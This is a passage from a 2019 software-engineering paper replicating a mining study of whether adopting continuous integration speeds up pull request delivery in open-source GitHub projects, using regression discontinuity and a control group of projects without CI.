CI. We observe results that vary between 10 and 16 percentage points from what has been observed based in the original data, i.e., the results of applying the same methods on a control group are only mildly more different than applying the same method on a new test group (RQ3.1). However, we observe that projects in the control group do not increase the number of PRs they are able to handle per release over time. This is different to both test groups, where we observe a statistically significant increase in submitted, merged, and released PRs per release after CI adoption. In summary, we consider the replication successful. Our concern regarding trends in the data has largely been alleviated, and an analysis of a control group has led to, at least subtly, different results. However, our results also indicate that PR delivery times seem to more strongly depend on when in the release cycle a PR comes in than on whether or not a CI system is present. This is consistent with the original study, which also reported that the presence of CI only impacts delivery time metrics with small effect sizes. Our study sheds some more light on why this is the case. Finally, we conclude that the delivery time of PRs is not strongly impacted by whether a project adopts CI, but projects that do are able to handle more PRs per release than projects that do not. The present article is based on work conducted by the first author over five months in early 2018 as part of her master’s thesis project at Chalmers University of Technology, under the supervision of the second author (Guo, 2019). The results presented here are a summary of this work, and more details can be found in the thesis report. BACKGROUND We now present important background on CI and the pull request based development model. Further, we summarize the main results of Bernardo, da Costa & Kulesza (2018), which we attempt to replicate in our study. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 3/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.245 CI and the pull request based development model CI is a practice which has originated from Agile software development and Extreme Programming. Its core tenet is the merging of all developer working copies to shared mainline several times a day. Each integration is then verified by an automated build, which allows errors to be detected and located as early as possible (see also online https://www.thoughtworks.com/continuous-integration). CI promises manifold benefits, such as quickening the delivery of new functionalities (Laukkanen, Paasivaara & Arvonen, 2015), reducing problems of code integration in a collaborative environment (Vasilescu et al., 2014), hence guaranteeing the stability of the code in the mainline. Consequently, CI has found widespread practitioner adoption (Hilton et al., 2016), making it a relevant subject of academic study. Tightly linked to CI (and to the GitHub open source development platform— https://github.com) is the idea of pull request based development (see also Fig. 1 for a schematic overview). In this model, the main repository is not shared with external developers. Instead, prospective contributors fork the central repository and clone it to a local repository. The contributor makes changes to the local repository, and commits their changes there. These local changes are then submitted to the main repository by opening a PR in the central repository. A CI system, such as Travis-CI (https://travis-ci.com), then automatically merges the PR into a test branch and runs the tests to check if the PR breaks the build. Finally, one or more rounds of code review (Bacchelli & Bird, 2013; McIntosh et al., 2014) are conducted and the integrator decides whether to approve the PR, after which it is merged and closed. Does using ci lead to faster pull request delivery? Note that a CI system is not strictly required for the pull request based development model to be followed. Bernardo, da Costa & Kulesza (2018) have studied whether using a CI system, which, as described, automates much of the testing that integrators otherwise would have to do manually, leads to shorter PR delivery times. They collected 162,653 PRs and 7,440 releases of 87 OSS projects using the GitHub API, and addressed the following three research questions: RQ1: Are merged pull requests released more quickly using CI? RQ2: Does the increased development activity after adopting CI increase the delivery time of PRs? RQ3: What factors impact the delivery time after adopting CI? By applying non-parametric tests to the merge and delivery time of PRs, the authors drew the conclusion for RQ1 that only half of the projects deliver PRs faster after adopting CI, but 71.3% of the studied projects merge PRs faster before using CI. In RQ2, they found that there is a considerable increase in the PR submission, merge and delivery rate, concluding that this may be the reason why projects do not deliver merged PRs faster after adopting CI. They also found that the number of releases per year does not change significantly after CI adoption. In RQ3, they built linear regression models for each project and used the Wald X2 maximum likelihood test to evaluate the explanatory power of a number of different factors. They found that the two variables with the highest explanatory Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 4/24 https://peerj.com https://www.thoughtworks.com/continuous-integration https://github.com https://travis-ci.com http://dx.doi.org/10.7717/peerj-cs.245 Figure 1 An overview of the pull request based development model. Full-size DOI: 10.7717/peerjcs.245/fig-1 power were both related to the volume of PRs that have to be merged, namely the merge workload (how many PRs are waiting to be merged?) and queue rank (is the PR at the beginning or the end of the merge queue?). RELATED WORK We now discuss previous work in related fields and how the research questions in the study fill in gaps presented in the field. CI adoption and pull requests Previous researchers have investigated the impact of adopting CI in projects in multiple aspects. Most papers agreed that the introduction of CI is beneficial to projects. Manglaviti et al. (2017) examined the human resources that are associated with developing and maintaining CI systems. They analyzed 1,279 GitHub repositories that adopt Travis-CI using quantitative methods. The authors found that for projects with growing contributor bases, adopting CI becomes increasingly beneficial and sustainable as the projects age. Further, there is a strong expectation that CI should improve the productivity of projects. Miller (2008) analyzed the impact of CI by summarizing their experience with CI in a distributed team environment at Microsoft in 2007. They collected various CI related data in their daily work. Teams moving to a CI driven process can expect to achieve at least a 40% reduction in check-in overhead when compared to a check-in process that maintains the same level of the code base and product quality. Ståhl & Bosch (2014) argued based on survey results that build and test automation saves programmer’s time for more creative work, and should thus increase productivity. Stolberg (2009) argued that CI practices speed up the delivery of software by decreasing integration times. However, not all previous study agree that adopting CI improves productivity. For instance, Parsons, Ryu & Lal (2007) found no clear benefits of CI on either productivity or quality. Related research has shown that the PR based development model is popular in OSS projects. For instance, Vasilescu et al. (2014) collected 223 GitHub projects and found Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 5/24 https://peerj.com https://doi.org/10.7717/peerjcs.245/fig-1 http://dx.doi.org/10.7717/peerj-cs.245 that for 39 of 45 project (87%), builds corresponding to PRs are much more likely to succeed than builds corresponding to direct pushes. Gousios, Pinzger & van Deursen (2014) found that 14% of repositories are using PRs on GitHub. They selected 291 projects from the GHTorrent corpus, and concluded that the PR model offers fast turnaround, increased opportunities for community engagement, and decreased time to incorporate contributions. CI impact on pull request success and release frequency Our study focuses on whether CI has an impact on PR delivery time. Bernardo, da Costa & Kulesza (2018) have conducted an extensive mining study on this subject (as discussed in more detail in ‘Does Using CI Lead to Faster Pull Request Delivery?’). Our present work is a conceptual replication of their paper. Hilton et al. (2016) have previously analyzed 34,544 open source projects from GitHub and surveyed 442 developers. The authors found that CI helps projects release twice as often and that when using CI, PRs are accepted 1.6 hours sooner in median. Vasilescu et al. (2014) studied the usage of Travis-CI in a sample of 223 GitHub projects written in Ruby, Python, and Java. They found that the majority of projects (92.3%) are configured to use Travis-CI, but less than half actually use it. In follow-up research, they investigated the productivity and quality of 246 GitHub projects that use CI (Vasilescu et al., 2015). They found that projects that use CI successfully process, accept, and merge more PRs. This increased productivity does not appear to be gained at the expense of quality. Finally, Yu et al. (2015) collected 103,284 PRs from 40 different GitHub projects. They investigated which factors affect PR evaluation latency in GitHub by applying a linear regression model and quantitative analysis. They found that the size of PR and the availability of the CI pipeline are strong predictors or PR delivery time. In later work, the same authors used a linear regression model to analyze which factors affect the process of the pull request based development model in the context of CI (Yu et al., 2016). They found that the likelihood of rejection of a PR increases by 89.6% when the PR breaks the build. The results also show that the more succinct a PR is, the greater the probability that such a PR is reviewed and merged quickly. Replication studies The need for conducting more replications of published research is by now rather widely accepted in the software engineering community, as documented through efforts such as the ROSE Festival (held, for instance, at ICSE (https://2019.icse-conferences.org/track/icse- 2019-ROSE-Festival) and FSE (https://github.com/researchart/rose3-fse19) in 2019). In general, replication is necessary to increase the trust in any individual piece of research –the results of any one study alone cannot be extrapolated to all environments, as there are typically many uncontrollable sources of variation between different environments (Shull et al., 2002). Successful replication increases the validity and reliability of the outcomes observed in an experiment (Juristo & Gmez, 2012). Shull et al. (2008) distinguish two types of replication studies. In exact replications, the original experimental design is followed as exactly as possible, while a conceptual replication attempts to answer the same research questions using an adapted methodology. We argue that conceptual replications are even Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 6/24 https://peerj.com https://2019.icse-conferences.org/track/icse-2019-ROSE-Festival https://2019.icse-conferences.org/track/icse-2019-ROSE-Festival https://github.com/researchart/rose3-fse19 http://dx.doi.org/10.7717/peerj-cs.245 more important than exact ones, as they allow us to control for deficiencies in research design, whereas exact replications mostly validate experiment execution. However, not all researchers share this excitement about replication studies. Shepperd (2018) argued that, due to wide prediction intervals, most replications end up successful anyway. Further, according to Basili, Shull & Lanubile (1999), replication studies in software engineering are particularly difficult to conduct, as experiments in this field usually involve a large number of context variables. Consequently, a systematic mapping study of replications in the software engineering field (Shull et al., 2008) concluded that the absolute number of replications is still small, in particular considering the breadth of topics in software engineering. Their study retrieved more than 16,000 articles, from which they selected 96 articles reporting only 133 replications. Our work is a contribution towards increasing the trustworthiness of research on the impact of CI on PR delivery times. Our replication design combines exact with conceptual replication—we decide to not deviate far from the original design of Bernardo, da Costa & Kulesza (2018), and also largely follow their style of presentation, while at the same time addressing the methodological concerns we had with their original work. METHOD The goal of the present study is to replicate and extend the results from earlier work presented in ‘Does Using CI Lead to Faster Pull Request Delivery?’. We now discuss our scientific methodology and the data that has been used. Fig. 2 provides a schematic overview. For RQ1, RQ2.1, and RQ2.2, the data set from the original study is re-used. For RQ3.1 and RQ3.2, two new data sets are collected from GitHub. For RQ1, the original statistical methods are re-used. For RQ2.1, an alternative analysis approach (RDD) is employed. For RQ2.2, the same method is extended with an additional analysis variable (the point in time in the release cycle when a PR is submitted, ‘‘come-in time’’). For RQ3.1, all analyses are applied to the new data sets. For RQ3.2, we only apply non-parametric tests, as our findings do not warrant applying the rest of the analyses to this data set. All data as well as the necessary analysis scripts are publicly available on GitHub https://github.com/radialine/Do- Open-Source-Projects-Deliver-Pull-Requests-Faster-Using-CI. Study subjects and data collection As depicted in Fig. 2, our study relies on three different sets of study objects –the original data provided by the authors, a set of new projects collected using the same methodology (new data), and a control group consisting of projects collected using the same methodology, but which, crucially, have to the best of our knowledge never adopted CI (control data). Basic information about the three data sets is contained in Table 1. The collection procedure is further described below. Original data We re-use the data that Bernardo, da Costa & Kulesza (2018) have made available online https://prdeliverydelay.github.io/#datasets. However, for a subset of our analysis, we need Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 7/24 https://peerj.com https://github.com/radialine/Do-Open-Source-Projects-Deliver-Pull-Requests-Faster-Using-CI https://github.com/radialine/Do-Open-Source-Projects-Deliver-Pull-Requests-Faster-Using-CI https://prdeliverydelay.github.io/#datasets http://dx.doi.org/10.7717/peerj-cs.245 Original New Control RQ1 RQ2.1RQ2.2 RQ3.1 RQ3.2 RQ1 Results Non-Parametric Test RQ2.1 Results RDD RQ2.2 Results Linear Regression RQ3.1 Results RQ3.2 Results All three methods Original Paper Results compare Non-Parametric Test Figure 2 Overview of study methodology and used data. Shaded elements are re-used from Bernardo, da Costa & Kulesza (2018). Full-size DOI: 10.7717/peerjcs.245/fig-2 additional information not contained in the original data (e.g., the exact point in time when a PR was merged). This information was collected directly through the GitHub API. New data For collecting a new data set, we largely follow the process originally used by Bernardo, da Costa & Kulesza (2018), which in turn was inspired by Vasilescu et al. (2015). We identify the 800 most highly-starred projects on GitHub written in Java, Python, PHP, Ruby, and JavaScript. This leads to a total of 2763 unique projects (projects that use multiple of these languages are counted only once). We discard all projects that are not using Travis-CI, as well as all projects that were already contained in the original data set. We further exclude all projects that have less than 100 merged PRs before or after CI adoption. That is, we only consider projects that have had reasonable development activity before and after adopting CI. Finally, we also discard toy projects, tutorials, and other similar projects that are not intended to be deployed to production. This leaves us with 54 projects, for which we then collect PR and release data using git and the GitHub API. Control data We use the same process as for new data to collect a control group, with the key difference that we discard all projects for which we can tell that they are, or have been, using any CI system, leading to 28 projects. Note that this data set is smaller, as, given the prevalence of CI, it is difficult to find high-profile projects with similar characteristics to the projects in the other two data sets which never adopted CI in their lifetime. Analysis methods As shown in Fig. 2, we use three different statistical methods in our study. We replicate two of the methods used in the original study, and introduce a third, new, method (regression discontinuity design, RDD). Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 8/24 https://peerj.com https://doi.org/10.7717/peerjcs.245/fig-2 http://dx.doi.org/10.7717/peerj-cs.245 Table 1 Basic data set statistics. Data set # of projects Total # of PRs Original data 87 162.653 New data 54 84.487 Control data 28 47.519 Methods re-used from the original study In line with the original work, we use non-parametric hypothesis testing (Mann-Whitney- Wilcoxon, MWW) for testing whether there is a statistically significant difference in pull request delivery time before and after CI introduction. MWW is used as data normality could not be assumed. MWW is used in conjunction with Cliffs delta to measure effect sizes, using the standard threshold values as defined by Romano et al. (2006). Additionally, we use a multiple regression model fitted with ordinary least squares to identify which factors best explain a dependent variable (delivery delay, in our case). We use the Wald X2 maximum likelihood test to evaluate the explanatory power of each independent variable. RDD Due to our concern that the original study did not properly control for changes in PR submissions and PR delivery time that are independent of CI (due to, for instance, project growth or other project lifetime related factors), we extend the original work with an additional statistical method, RDD, as inspired by the work of Zhao et al. (2017). RDD is a fairly old idea firstly proposed by Thistlethwaite & Campbell (1960), which is seeing a renaissance in recent years (Imbens & Lemieux, 2008). It is a quasi-experimental pretest- posttest design that elicits the causal effects of interventions by assigning a cutoff above or below when an intervention is applied (CI introduction, in our case). The assumption of RDD is that the trend continues without changes if the intervention does not exist. We would conclude that CI had a significant impact if there is an obvious discontinuity around the cutoff point (the point in time when the intervention has been applied). A core question when applying RDD is which model(s) to use for fitting the data before and after the intervention. In this study, four models of RDD are used, as sketched in Fig. 3. The linear model with common slope assumes that the data before and after the intervention can be fit using the same linear regression model (shifted by a constant), while the linear model with different slopes only assumes that both sides can be fit by any linear regression. The non-linear model assumes that at least one side requires fitting using a non-linear regression. Finally, local linear regression performs exactly that using the Imbens-Kalyanaraman optimal bandwidth calculation. RESULTS We now discuss the results for each research question. Given that this is a replication study, a particular emphasis will be put on comparing our results to Bernardo, da Costa & Kulesza (2018) and evaluating to what extent the results therein still hold. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 9/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.245 Figure 3 RDD estimation models. Full-size DOI: 10.7717/peerjcs.245/fig-3 PR Submitted PR Merged PR Released MD (Merge Delay) DD (Delivery Delay) PL (Pull Request Lifetime) Figure 4 Graphical overview of the evaluated metrics DD, MD, and PL. Adapted from Bernardo, da Costa & Kulesza (2018). Full-size DOI: 10.7717/peerjcs.245/fig-4 RQ1 –exact replication As a first step in the study, we conducted an exact replication of Bernardo, da Costa & Kulesza (2018), based on the data that the authors provide. This was deemed necessary as a first step of validation, but also to acquire the necessary in-depth knowledge about the original study’s design choices. RQ1 of the original study investigated the impact of adopting CI on the delivery time of PRs. They analyzed three metrics, which are delivery delay (DD, days between when a PR got merged and when it was released), merge delay (MD, days between when a PR was submitted and when it was merged), and pull request lifetime (PL). A visual overview of these metrics and what they mean in the PR lifecycle is presented in Fig. 4. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 10/24 https://peerj.com https://doi.org/10.7717/peerjcs.245/fig-3 https://doi.org/10.7717/peerjcs.245/fig-4 http://dx.doi.org/10.7717/peerj-cs.245 Table 2 Results of the exact replication of RQ1 in Bernardo, da Costa & Kulesza (2018). Faster with CI [% of Projects] Stat. Different [% of Projects] DD Original 51.4% 82.8% Replication 47.9% 83.9% Difference 3.5 1.1 MD Original 27% 72.4% Replication 29.4% 78.2% Difference 2.4 5.8 PL Original 48.4% 71.3% Replication 52.4% 72.4% Difference 4 1.1 After carefully studying the original paper and limited follow-up discussion with the authors through private communications, we are able to reproduce their results. Table 2 contrasts the original results with the results of our exact replication. We report on the percentage of projects for which each of these metrics improved after introducing CI (i.e., handling PRs became faster) and the percentage of projects for which there is a statistically significant difference (in any direction). Cliff’s delta effect sizes for the latter metric vary between 0.2 and 0.3 (i.e., a small effect size), except for the changes in pull request liftetime, where we observe medium or even large effect sizes for a majority of projects. It is interesting to note that even though we used the same methods on the same data, we were not able to achieve entirely identical results (differences between 1.1 and 5.8 percentage points). We speculate that the observed differences may be due to undocumented data cleaning procedures or updates to the publicly available data set. However, given that the main findings of the study remain unchanged, we nonetheless consider the replication successful. RQ2 in the original study then tried to find the reason for this phenomenon. The authors compare the number of submitted, merged, and released PRs before and after CI adoption. We again replicate this analysis, leading to the results depicted in Fig. 5. For this analysis step, our results are virtually identical to what has been presented in Bernardo, da Costa & Kulesza (2018). We observe that after CI was adopted, thenumber of submitted, merged and released PRs per release increases statistically significantly with medium effect sizes. Interestingly, the release frequency does not change statistically significantly after adopting CI. Box 1. Summary and Lessons Learned. We were able to conduct an exact replication of the original paper, with minor dif- ferences in the results (between 1.1 and 5.5 percentage points). All main results of the original study are confirmed. This analysis indeed supports that only about half the projects deliver PRs faster (with a small effect size) after introducing CI, but less than a third of projects improves how fast they merge PRs (again with a small effect size). While projects do not seem to release more frequently, they can handle more PRs per release after CI adoption. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 11/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.245 Figure 5 Comparison of merged and released PRs per release before (‘‘NO-CI’’) and after (‘‘CI’’) in- troduction of CI. Full-size DOI: 10.7717/peerjcs.245/fig-5 RQ2 –conceptual replication We now discuss the two additional analysis steps we have introduced in our study in comparison to the original work. Application of RDD (RQ2.1) In the first step of our conceptual replication, we use RDD to analyze whether there are gradual changes in PR delivery time over the lifetime of projects, independently of CI introduction. However, an initial visual inspection of both, DD and PL, reveals that these metrics follow a clear pattern that is independent of CI introduction. Figures 6 and 7 depict this for two example projects (mantl/mantl and mozilla-b2g/gaia). Virtually all 87 projects in the original data set follow a similar pattern, indicating that these metrics are to a large degree dominated by when in the release cycle a PR comes in –PRs merged shortly after a release need to wait for the next release to roll around, while PRs merged shortly before a release get released much quicker. It is unlikely that the introduction of CI has much direct impact on this. It should be noted that this is true even for PL, which represents the entire delivery time of a PR (i.e., the time it takes maintainers to merge a PR plus the time the PR then waits to get released). Hence, it seems unlikely that the introduction of CI can impact this end-to-end delivery time of a PR by much. This also explains why we, similar to the original study, observe primarily differences with small effect sizes in RQ1. Ultimately, the end-to-end delivery time is presumably much Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 12/24 https://peerj.com https://doi.org/10.7717/peerjcs.245/fig-5 http://dx.doi.org/10.7717/peerj-cs.245 Figure 6 Visual inspection of metric delivery delay (DD) for two example projects. (A) mantl/mantl, (B) mozilla-b2g/gaia. The x-axis represents project lifetime in weeks, with point 0 being the RDD cutoff point (i.e., the time when CI has been adopted in the project). Full-size DOI: 10.7717/peerjcs.245/fig-6 Figure 7 Visual inspection of metric pull request lifetime (PL) for two example projects. (A) mantl/- mantl, (B) mozilla-b2g/gaia. The x-axis represents project lifetime in weeks, with point 0 being the RDD cutoff point (i.e., the time when CI has been adopted in the project). Full-size DOI: 10.7717/peerjcs.245/fig-7 more dependent on how frequently a project releases than on whether a CI system is used, which we have established in RQ1 to not be impacted by CI adoption. However, no such pattern exists for the third metric, MD. Hence, we attempt to apply all four RDD models described in ‘Analysis Methods’. The data of each project is divided into two buckets separated by the cutoff point (when CI was adopted), and one model for each bucket is fit. Fig. 8 shows the fitted models of project boto/boto. In the first three models, the red and blue lines fit data after and before the intervention respectively. It is evident that neither the two linear models (Figs. 8A and 8B) provide sufficient fit to accurately represent the data for boto/boto. Indeed, the linear or non-linear models never achieve an R2 value higher than 0.35 for any of the 87 projects. The local linear regression model depicted in Fig. 8D provides a better, albeit still very noisy, fit to the data. Hence, we conclude that there is no, or at least no particularly relevant, ‘‘natural trend’’ of MD getting faster or slower over time in any of the projects. Hence, we consider our original concern with the work of Bernardo, da Costa & Kulesza (2018) (that projects may just naturally get faster or slower over time) to be unsupported. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 13/24 https://peerj.com https://doi.org/10.7717/peerjcs.245/fig-6 https://doi.org/10.7717/peerjcs.245/fig-7 http://dx.doi.org/10.7717/peerj-cs.245 Figure 8 Four RDD models fit for project boto/boto. (A) Linear model (common slope). (B) Linear model (diff slopes). (C) Non-linear model. (D) Local linear regression model. The x-axis represents project lifetime in weeks, with point 0 being the RDD cutoff point (i.e., the time when CI has been adopted in the project). Full-size DOI: 10.7717/peerjcs.245/fig-8 Evaluation of “Come-In Time” as Predictor of PR Delivery Time (RQ2.2) In an attempt to explain what exactly impacts the end-to-end lifetime of a PR (PL), the original study built a multiple regression model based on 13 different variables (related to characteristics of the project, the PR submitter, and the PR itself). They found that three metrics (merge workload, queue rank, and, to a lesser degree, the contributor) had significant explanatory power with regards to PL. Before CI adoption, the merge workload has the highest explanatory power, which changes to the queue rank after adoption. Based on our previous findings, we speculate that in fact the most important predictor of end-to-end PR delivery time may be when in the release cycle a PR has been merged. We refer to this new factor as ‘‘come-in time’’, and provide a schematic overview of its definition in Fig. 9. We re-use the original methodological setup (regression analysis using ordinary least squares), but use the variables sketched in Table 3. We remove all variables which had an explanatory power close to 0 in the original study, leaving us with 6 potential factors Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 14/24 https://peerj.com https://doi.org/10.7717/peerjcs.245/fig-8 http://dx.doi.org/10.7717/peerj-cs.245 Figure 9 Definition of the factor ‘‘come-in time’’. Full-size DOI: 10.7717/peerjcs.245/fig-9 Table 3 Description of all variables used in the regression model. The first 6 variables are re-used from Bernardo, da Costa & Kulesza (2018), the last variable has been newly introduced in our study. Variable Definition Variables From Original Study Number of Activities An activity is an action to a PR conducted by a GitHub user, e.g., labeled, assigned, etc. It is assumed that a large number of activities may lead to longer delivery times. Merge Time The time between when a PR was created and when it was merged by an integrator (MD). Contributor Experience The number of released PRs that were created by the same author. We speculate that contributions by an experienced contributor may be evaluated less critically, and hence may be delivered faster. Contributor Integration The mean delivery time in days of the past PRs submitted by this contributor. If past PRs were released quickly, then the next PR submitted by the same person may also be released rapidly. Merge Workload The number of PRs waiting to be merged at the time when the PR was submitted. We speculate that, as the time and energy of integrators is limited, the workload of an integrator may have an impact on delivery times. Queue Rank This variable represents the order of the merged PRs in a release cycle. A merged PR might be released faster or slower depending of its position in the merge queue. New Variable Come-in Time The time in days between the time when a PR got merged and the time of the last release (see also Figure ??). This new variable is motivated by our previous findings. of influence (‘‘merge workload’’, ‘‘queue rank’’, ‘‘contributor experience’’, ‘‘contributor integration’’, ‘‘number of activities’’, and ‘‘merge time’’). We add the new variable ‘‘come-in time’’ to this set. From these variables, we build two regression models for each project (before and after CI adoption), and evaluate the R2 metric for each model. R2 represents how much of the variability in the data can be explained using the model. Following Bernardo, da Costa Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 15/24 https://peerj.com https://doi.org/10.7717/peerjcs.245/fig-9 http://dx.doi.org/10.7717/peerj-cs.245 Figure 10 Bar chart plotting the variables with the highest explanatory power for each project, before (‘‘NO-CI’’) and after (‘‘CI’’) CI adoption. Only projects for which a regression model with R2 > 0.5 could be trained are considered. Full-size DOI: 10.7717/peerjcs.245/fig-10 & Kulesza (2018), we only accept models with R2 > 0.5 as sufficiently accurate. Prior to CI adoption, the models for 17 of 87 projects (19.8%) have R2 values higher than 0.5 (median of these is 0.58). After CI adoption, we achieve only 9 valid models (10.5%), with a median R2 value of 0.57. This is in line with our previous findings, and indicates that PR delivery time is in general rather unpredictable, and unlikely to depend on any single factor. Figure 10 depicts for how many projects (among those for which a model with R2 > 0.5 could be found) each variable is the one with the highest explanatory power, as measured through the Wald X2 maximum likelihood test. Our newly proposed variable ‘‘come-in time’’ indeed outperforms all variables from the original study. This further supports that the factor most important to the end-to-end delivery time of a PR is whether it has been merged close in time to the next release. It is also noticable that all variables related to the nature of the PR or the contributor are less relevant than process- and project-oriented metrics, such as when a PR comes in, which position in the merge queue it has, or how large the merge workload currently is. It needs to be noted that there is a high correlation between the new metric ‘‘come-in time’’ and ‘‘queue rank’’, one of the metrics in the original study, in a subset of the projects. Namely, in 19 of 87 projects (22%) the correlation between these metrics is larger than 0.7 prior to introducing CI, and in 21 of 87 projects (24%) after CI introduction. For the remaining projects, there is a correlation between these metrics, but it is less pronounced. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 16/24 https://peerj.com https://doi.org/10.7717/peerjcs.245/fig-10 http://dx.doi.org/10.7717/peerj-cs.245 Box 2. Summary and Lessons Learned. Applying RDD to the original data set primarily revealed that two of the three ana- lyzed metrics (DD and PL) follow very clear patterns, namely that they depend to a large degree on the time until the next release. Consequently, when in the release cycle a PR is merged is the best predictor of delivery time (PL). The merge delay MD does not follow such a pattern. We did not observe in any project that MD would trend up- or downwards independently of CI adoption, alleviating our original concern with the original study. However, our experiments also confirm the result from the original study that the delivery time is generally difficult to predict, as indicated by the low R2 metric of the regression models of most projects. RQ3 –Generalizability So far, we have applied all analyses to the data set also used in the original study. Now we turn towards evaluating whether the previous findings are specific to the used data. Analysing new data (RQ3.1) In a first step, we evaluate the generalizability of our findings by collecting 54 new projects (which have also adopted CI), and conducting the same analyses as presented in ‘RQ1—Exact Replication’ and ‘RQ2—Conceptual Replication’. We firstly again evaluate how many projects improved DD, MD, and PL, and used a MWW test to evaluate statistical significance. The results of this analysis are provided in Table 4, which also provides our own results from RQ1 as a point of comparison. We observe that the results are not fundamentally different, although we observe 10 to 14 percent points difference in selected results (particularly related to the delivery delay DD). Effect sizes are small, as also observed for the original data. A replication of our analysis of submitted, accepted, and released PRs confirms our findings that projects statistically significantly increase their development activities after adopting CI (with medium effect size), but we can again not find a statistically significant change in the number of releases. Finally, the re-execution of RDD (RQ2.1) on the new data yields similarly comparable results. A deeper discussion of this aspect is omitted here for reasons of brevity, but can be found in Guo (2019). An interesting result is found when fitting regression models, as discussed for RQ2.2, to the new data. For 54 projects, only 2 models (3.7%) trained on data after CI adoption and 5 models (9.3%) for data before CI adoption achieve an R2 metric higher than 0.5. It remains unclear why the regression approach works even less well on the new than on the original data. However, given that R2 values were generally low even for the original data, this result may ultimately just stress that predicting delivery times is difficult at the best of times. Analysing a control group (RQ3.2) So far, we have experimented only with projects that actually adopted CI at some point in the project’s lifetime. We now turn towards analysing our control group of comparable Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 17/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.245 Table 4 Results of a re-analysis using a new data set. Faster with CI [% of Projects] Stat. Different [% of Projects] DD Original data 47.9% 83.9% New data 58% 98% Difference 10.1 14.1 MD Original data 29.4% 78.2% New data 19.5% 80.4% Difference 9.9 2.2 PL Original data 52.4% 72.4% New data 46.5% 79.6% Difference 5.9 7.2 Table 5 Results of a re-analysis using a control group of projects which never introduced CI. Faster with CI [% of Projects] Stat. Different [% of Projects] DD Original data 47.9% 83.9% Control data 59.2% 96.4% Difference 11.3 12.5 MD Original data 29.4% 78.2% Control data 28% 89.3% Difference 1.4 11.1 PL Original data 52.4% 72.4% New data 40% 89.3% Difference 12.4 16.9 projects which, as far as we can observe, have never adopted CI. One challenge in this context is what point in the project’s history to use as cutoff for analysis. From analysing the 87 projects in the original data set, we learn that these projects, on average, introduce CI after 38.2% of the lifetime of the project in days (median 38%, variance 8.5). Hence, we decide to introduce a ‘‘mock-ci-timepoint’’ for the projects in the control group that corresponds to 38% of their lifetime. Intuitively, this is the point in time when these projects would have, on average, adopted CI (if they ever did). A comparison of the results achieved for this control group with the results achieved for the original data set is provided in Table 5. Note that in this case ‘‘Faster with CI’’ for the control group should be interpreted as ‘‘faster after the mock-ci-timepoint’’ of 38%. The results of this analysis indicate that we do observe (slightly) larger differences between the original test group and the control group than what we have observed for the two different test groups in RQ3.1 (cp. Table 4). This supports the conclusion that the introduction of CI has some modest impact on these numbers. However, when analyzing the number of submitted, merged, and released PRs, we observe that there is no difference between before and after the (mocked) CI introduction. This is visualized in Fig. 11. Statistical testing does not reveal any differences before and after the mocked CI introduction for any metric. Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 18/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.245 Figure 11 Comparison of merged and released PRs per release before and after CI inroduction for a control group of projects that never introduced CI. (A) #Submitted PRs/release; (B) #Merged PRs/re- lease; (C) #Delivered PRs/release; (D) #release/year. Full-size DOI: 10.7717/peerjcs.245/fig-11 Hence, we support the argument by Bernardo, da Costa & Kulesza (2018) that the introduction of CI seems to have a (minor) impact on PR delivery time of projects. However, projects in both test groups manage to handle considerably more PRs per release after CI adoption, while we have not observed any statistically significant increase in the control group. Hence, we conclude that projects do not so much speed up handling individual PRs, but rather manage to handle considerably more PRs per release after adopting CI. Box 3. Summary and Lessons Learned. Applying our analyses to new data sets allowed us to evaluate to what extent the ef- fects observed so far are due to specifics of the data collected by Bernardo, da Costa & Kulesza (2018). When analyzing a new data set collected using the same methodology, we have observed results that are in the broad strokes similar to the original findings, although we have observed differences up to 14 percentage points for individual met- rics. When analyzing a control group of projects that never adopted CI, we found re- sults not unlike to the results of the new test group, indicating that the small size ef- fects we observed in RQ1 may be independent of CI introduction. However, we have observed that both test groups handle more PRs after CI adoption with medium ef- fect size, while we have not observed a statistically significant increase for the control group. This leads us to believe that projects may not actually handle individual PRs Guo and Leitner (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.245 19/24 https://peerj.com https://doi.org/10.7717/peerjcs.245/fig-11 http://dx.doi.org/10.7717/peerj-cs.245 (much) faster after CI adoption, but they are able to handle considerably more PRs per release. THREATS TO VALIDITY This section addresses potential threats to the validity of our replication and overall results. Construct validity Construct validity describes threats related to the design of the study. To a large degree, we have chosen the same data collection procedures, statistical methods, and analysis techniques that were already present in the original study. This was done by design, so as to keep our replication easily comparable to the original study. However, this also means that any limitations inherent in the original study design are still present in our replication (with the exception of those that we explicitly chose to address as part of our conceptual replication). For the construction of our control group, there are two related threats. (1) Even though we carefully attempted to determine whether a candidate project for the control group does indeed not use any CI system, it is not always feasible to determine this from an outsider’s point of view (e.g., a company-backed OSS project may use a CI system within the company, which is not mentioned on the GitHub page). (2) Even though we attempted to keep the control group as similar in characteristics to the original study objects as possible, the mere fact that these projects have chosen to not adopt CI may already hint at deeper differences in mindsets, processes, and project goals than what is visible from GitHub metrics alone. These differences may also account for some of the different results we have observed. Further, our control group is considerably smaller than the original data set (28 versus 87 projects). External validity External validity concerns to what extent the findings of the study still hold under in more generalized circumstances. Part of our replication was specifically to 